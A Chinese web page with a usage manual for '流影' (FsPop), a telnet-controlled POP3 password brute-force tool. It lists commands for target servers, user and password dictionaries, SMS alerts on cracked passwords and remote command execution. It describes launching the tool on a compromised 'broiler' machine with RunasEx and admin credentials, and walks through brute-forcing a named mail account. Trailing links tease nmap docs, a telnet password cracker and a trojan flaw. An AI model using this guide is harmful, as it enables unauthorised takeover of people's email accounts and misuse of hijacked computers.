流影使用说明

所属分类: 网络安全 / 工具使用 阅读数: 264
收藏 0 赞 0 分享
一、流影简介流影是一个和流光功能相似的工具,和流光最大的不同在于,流光是运行于用户主机也就是客户端的,是一个图形界面的工具,而流影可以同时运行于服务器端和客户端的工具。用户可以通过telnet来进行远程管理和控制。二、控制命令流影的全部设置通过Telnet来进行,采用命令行方式。Set Server <POP3 Server> 设置探测的POP3服务器,如:Set Server pop.21cn.comSet User <Username>|<File: User List File>|<Scheme: User Scheme File> 设置需要探测的用户名、用户列表文件或用户方案文件,关于用户列表文件及用户方案文件的详细解释参阅[流光]的说明文件。如:Set User Victim, Set User File:c:\password.dic, Set User Scheme: user.schSet Password <Password>|<Dictionary File>|<Dictionary Scheme File> 设置探测时采用的密码、密码字典或密码程序方案。如:Set Password 123456, Set Password File: Password.dic, Set Password Scheme: Pass.SchRun 开始探测Stat 查看当前运行的情况Set Singlemode <ON>|<OFF> 开启/关闭简单模式,如果简单模式开启会自动用相同的用户名作为密码探测一次。Show Result <Current>|<Total> 查看已经探测出的本次密码或所有密码记录Stop 停止当前探测。Set Suffix <NULL>|<Suffix Word> 设置是否自动在每一个密码后加指定的后缀。如:Set Suffix 123,即在每一个密码后自动加后缀123。Ex:pass->pass123Set Prefix <NULL>|<Prefix Word> 设置是否自动在每一个密码后加指定的前缀。如:Set Prefix 123,即在每一个密码前自动加前缀123,Ex:pass->123passSet Gsm <NULL>|<GSM ID> ET:<Freq> 设置需要发送短消息的手机号码。如:Set GSM 13900101234 ET00,设置号码为13900101234,每探测出100个密码及发送一次。注意:必须是中国移动的手机,而且已经开通了短信息服务。Set Sms <Message> 短消息发送,用于测试短消息的发送,发送的号码为Set Gsm指定的号码。Change Password <New Password> 改变登陆的密码Cmd [/display] <Cmd> 执行制定的程序,[display]选项用于指定是否显示执行的输出结果。如:Cmd /display dirQuit 退出Telnet控制端。ShutDown 结束流影的运行。三、启动如果是在本地运行,直接键入如下命令即可:FsPop.exe <Port> <Control Password> [/Verbose]Port: 流影开启的端口,此端口可以和已经开启的端口重用,例如和端口137重用。Control Password: 每一次用Telnet连接流影时的密码,最多8位。/Verbose: 本地输出模式,如果打开此选项,可以在运行时看到扫描的过程,不建议在远程使用。如果在远程启动,首先用SRV开启的端口登陆,之后需要用RunasEx来创建流影的进程,如:RunasEx administrator password "c:\winnt\system32\FsPop.exe 137 123456" 建议在本地使用熟练后,再放到远程运行。四、一个典型的例子第一部需要做的当然是搞到一部肉鸡,经过用[流光2000]的探测,我们找到了一个肉鸡192.168.16.1(为了便于举例,此处是我在局域网中一台机器)。1、复制一些必要的文件上去2、启动srv进程,登陆3、利用RunasEx创建Fspop.exe进程从上面可以看到,进程创建成功。现在我们可以来控制流影作一些事情了。我们需要破解一个帐号fybugang12@21cn.com(纯属虚构,请勿对号入座),在一般的字典破解无效后,决定采用一个比较大的方案来暴力破解,方案的文件名为user.sch,是2个字母加4个数字的组合。首先Telnet到流影开启的端口,在这个例子中是137,详细过程参见下图。需要说明的一点是,由于我们仅仅设定了一个用户,所以在设定手机短信息的发送频率时设为1,即ET:1,也就是说一旦扫描成功,就通过短信息通知。从上面用Stat命令可以看出,完成这一次扫描最多需要676万次探测,通常在远程的扫描速度可以达到100万次/天,也就是说可以在一周内完成。当开始扫描后,我们就可以不必理会了,因为这一切都是在服务器上进行的。------------------
更多精彩内容其他人还在看

流影使用说明

一、流影简介流影是一个和流光功能相似的工具,和流光最大的不同在于,流光是运行于用户主机也就是客户端的,是一个图形界面的工具,而流影可以同时运行于服务器端和客户端的工具。用户可以通过telnet来进行远程管理和控制。二、控制命令流影的全部设置通过Telnet来进
收藏 0 赞 0 分享

关于webscanner的分析

前几天风起用这给扫描软件扫了某些国内的网站,也包括了我们自己的网站,然后说了我们网站的安全问题,后来我仔细看了扫出来的漏洞报告,也把这个软件使用了一下,发现这个软件扫出来的报告并不一定准确,所报告的漏洞也不一定会有危险这个程序是一个相当简单的程序,
收藏 0 赞 0 分享

Nmap网络安全扫描器说明

Nmap网络安全扫描器说明(Linux )信息来源:苏樱作者:Fyodor 译者:quack名称: nmap - 网络勘察工具和安全扫描器摘要nmap [扫描类型] [选项] <主机或网络 #1 ... [#N]>描述nmap被开发用于允许系统管理员察看一个大的网络系
收藏 0 赞 0 分享

溯雪使用说明

一、关于溯雪1、由于种种原因,溯雪是一个英文的版本,欢迎有兴趣的朋友汉化。2、此次的说明书仅仅是一个快速的使用指南,如果您有兴趣,可以帮我写一个。如果没有人愿意写的话,那只好我自己写了。:-(3、这是一个免费的产品。二、溯雪可以做什么1、对免费信箱的探测,
收藏 0 赞 0 分享

Telnet密码破解软件Letmein1.0说明

首先启动 LetMeIn! V1.0, 我们先假设在 nowhere.unix.net 中有一个帐号叫作 guest使用的密码为 guest003, 且我们有一个 dic.txt 档案, 内含有字典档, 其内容为:-----Cut here DIC.TXT ------guest
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(5)

Nmap网络安全扫描器说明(5) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描范例--------*这里是一些运用nmap的扫描范例,从最简单普通的到有一些复杂的例子都有。注意这里有真实的数字以及一些真实的域名——这
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(3)

Nmap网络安全扫描器说明(3) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详常规选项--------*这些选项并非必需的,但有些会非常实用。-P0 在扫描前不尝试或者PING主机,这是用来扫描那些不允许ICMP ech
收藏 0 赞 0 分享

不需要任何密码就能达到进入中有冰河的机器!!!

不需要任何密码就能达到进入中有冰河的机器!!!小飞刀 [[冰河第一站]]冰河出现到现在,使用得如此之广,影响如此之大。 却万万没有人想到冰河服务端竟然存在着如此严重的漏洞:“不需要任何密码就可以将本地文件在远程机器上打开!!!” 漏洞一:不需要密码远程运行本地文
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(2)

Nmap网络安全扫描器说明(2) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详扫描类型--------*-sT TCP connect()扫描:这是对TCP的最基本形式的侦测。在该操作下,该connect()对目标主机上
收藏 0 赞 0 分享

Nmap网络安全扫描器说明(4)

Nmap网络安全扫描器说明(4) 作者:作者:Fyodor 译者:quack发布日期:2002-2-6上传日期:2002-2-6来源:不详定时选项--------*虽然nmap在一般情况下都能够很好地在运行时间里尽可能迅速地完成扫描任务,但偶尔还是会有一些主机/端口无法侦测,这可
收藏 0 赞 0 分享
查看更多